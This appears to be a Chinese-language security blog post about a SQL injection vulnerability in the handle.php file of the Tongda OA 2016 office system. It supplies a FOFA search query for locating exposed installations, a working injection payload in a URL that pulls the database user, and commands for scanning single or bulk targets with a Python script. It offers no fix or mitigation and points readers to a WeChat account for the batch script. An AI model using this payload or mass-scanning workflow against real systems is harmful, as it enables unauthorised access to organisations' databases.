一、漏洞描述

北京通达信科科技有限公司通达OA2016网络智能办公系统 handle.php 存在sql注入漏洞，攻击者可利用此漏洞获取数据库管理员权限，查询数据、获取系统信息，威胁企业单位数据安全。

二、网络空间搜索引擎查询

fofa查询

app="TDXK-通达OA" && body="2016"

三、漏洞复现

poc

/share/handle.php?_GET[module]=1%27+and+1={`=%27`+1}+and+1=0+union+select+(select/**/user())--+%27

浏览器直接访问

四、批量检测

单个检测

 python .\TdOA2016.py -u  http://ip:port

批量检测

 python .\TdOA2016.py -u filename

微信公众号关注 网络安全透视镜 回复 20231016 获取批量检测脚本